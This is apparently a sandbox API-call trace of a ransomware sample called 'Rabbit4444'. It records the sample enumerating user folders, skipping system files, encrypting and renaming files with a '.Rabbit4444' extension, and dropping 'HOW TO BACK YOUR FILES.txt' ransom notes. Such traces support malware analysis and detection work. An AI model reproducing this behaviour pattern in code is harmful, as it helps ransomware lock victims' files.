(lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.342] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.342] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="Rabbit4444.exe") returned -1 [0053.342] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2=".") returned 1 [0053.342] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="..") returned 1 [0053.342] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="windows") returned -1 [0053.342] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="bootmgr") returned -1 [0053.342] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="pagefile.sys") returned -1 [0053.342] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="boot") returned -1 [0053.342] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="ids.txt") returned -1 [0053.342] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="NTUSER.DAT") returned -1 [0053.342] lstrcpyW (in: lpString1=0x130ebfe, lpString2="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71" | out: lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71") returned="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71" [0053.342] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", dwFileAttributes=0x20) returned 1 [0053.344] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", dwFileAttributes=0x4) returned 1 [0053.344] lstrlenW (lpString="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71") returned 69 [0053.344] lstrlenW (lpString="Rabbit4444") returned 10 [0053.344] lstrcmpiW (lpString1="2cdac43a71", lpString2="Rabbit4444") returned -1 [0053.344] lstrlenW (lpString=".dll") returned 4 [0053.344] lstrcmpiW (lpString1="3a71", lpString2=".dll") returned 1 [0053.344] lstrlenW (lpString=".lnk") returned 4 [0053.344] lstrcmpiW (lpString1="3a71", lpString2=".lnk") returned 1 [0053.344] lstrlenW (lpString=".ini") returned 4 [0053.344] lstrcmpiW (lpString1="3a71", lpString2=".ini") returned 1 [0053.344] lstrlenW (lpString=".sys") returned 4 [0053.344] lstrcmpiW (lpString1="3a71", lpString2=".sys") returned 1 [0053.345] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.345] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.345] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14465545885) returned 1 [0053.345] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=45) returned 1 [0053.345] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0053.345] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0053.345] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x330, lpName=0x0) returned 0x298 [0053.346] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x330) returned 0x70000 [0053.347] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.347] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0053.347] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.347] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0053.347] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.347] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0053.347] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.347] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0053.347] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14465826044) returned 1 [0053.348] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0053.348] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0053.348] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.348] CloseHandle (hObject=0x298) returned 1 [0053.348] CloseHandle (hObject=0x278) returned 1 [0053.348] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71.Rabbit4444") returned 179 [0053.348] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71.rabbit4444"), dwFlags=0x1) returned 1 [0053.352] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x78b163bf, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x78b163bf, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x78b163bf, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", cAlternateFileName="EC679D~1")) returned 1 [0053.352] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.352] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.352] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="Rabbit4444.exe") returned -1 [0053.352] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2=".") returned 1 [0053.352] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="..") returned 1 [0053.352] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="windows") returned -1 [0053.352] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="bootmgr") returned 1 [0053.352] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="pagefile.sys") returned -1 [0053.352] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="boot") returned 1 [0053.352] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="ids.txt") returned -1 [0053.352] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="NTUSER.DAT") returned -1 [0053.352] lstrcpyW (in: lpString1=0x130ebfe, lpString2="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71" | out: lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71") returned="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71" [0053.352] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", dwFileAttributes=0x20) returned 1 [0053.353] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", dwFileAttributes=0x4) returned 1 [0053.353] lstrlenW (lpString="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71") returned 69 [0053.353] lstrlenW (lpString="Rabbit4444") returned 10 [0053.353] lstrcmpiW (lpString1="2cdac43a71", lpString2="Rabbit4444") returned -1 [0053.353] lstrlenW (lpString=".dll") returned 4 [0053.353] lstrcmpiW (lpString1="3a71", lpString2=".dll") returned 1 [0053.353] lstrlenW (lpString=".lnk") returned 4 [0053.353] lstrcmpiW (lpString1="3a71", lpString2=".lnk") returned 1 [0053.353] lstrlenW (lpString=".ini") returned 4 [0053.353] lstrcmpiW (lpString1="3a71", lpString2=".ini") returned 1 [0053.353] lstrlenW (lpString=".sys") returned 4 [0053.353] lstrcmpiW (lpString1="3a71", lpString2=".sys") returned 1 [0053.353] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.354] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.354] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14466436196) returned 1 [0053.354] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=47) returned 1 [0053.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0053.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0053.354] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x330, lpName=0x0) returned 0x298 [0053.357] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x330) returned 0x70000 [0053.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0053.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0053.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0053.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0053.358] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14466875607) returned 1 [0053.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0053.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0053.358] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.358] CloseHandle (hObject=0x298) returned 1 [0053.358] CloseHandle (hObject=0x278) returned 1 [0053.358] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71.Rabbit4444") returned 179 [0053.358] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71.rabbit4444"), dwFlags=0x1) returned 1 [0053.359] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x78b163bf, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x78b163bf, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x78b163bf, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", cAlternateFileName="EC679D~1")) returned 0 [0053.359] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0053.359] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.359] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.360] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.360] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.360] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.360] CloseHandle (hObject=0x278) returned 1 [0053.360] CloseHandle (hObject=0x27c) returned 1 [0053.360] GetCurrentThreadId () returned 0xd98 [0053.360] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63f0 [0053.360] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials" [0053.360] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0053.360] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63e8 | out: hHeap=0xe0000) returned 1 [0053.360] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials" [0053.361] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\" [0053.361] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\.BFC0E91B00AE8A0620D3" [0053.361] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\credentials\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.362] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.364] FlushFileBuffers (hFile=0x27c) returned 1 [0053.365] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.366] CloseHandle (hObject=0x27c) returned 1 [0053.366] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials") returned 53 [0053.366] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.366] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x39c1605f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd370742a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe921cd0a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0053.366] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.366] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.366] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.366] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.366] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x39c1605f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd370742a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe921cd0a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.366] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.366] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.366] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.366] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.367] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.367] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe921cd0a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe921cd0a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe921cd0a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.367] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.367] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.367] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe921cd0a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe921cd0a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe921cd0a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0053.367] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0053.367] lstrcpyW (in: lpString1=0x130eba4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.367] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\credentials\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.367] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.367] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.367] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.368] CloseHandle (hObject=0x278) returned 1 [0053.368] CloseHandle (hObject=0x27c) returned 1 [0053.368] GetCurrentThreadId () returned 0xd98 [0053.368] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0053.368] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography" [0053.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0053.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0053.368] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography" [0053.368] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\" [0053.368] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\.BFC0E91B00AE8A0620D3" [0053.368] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 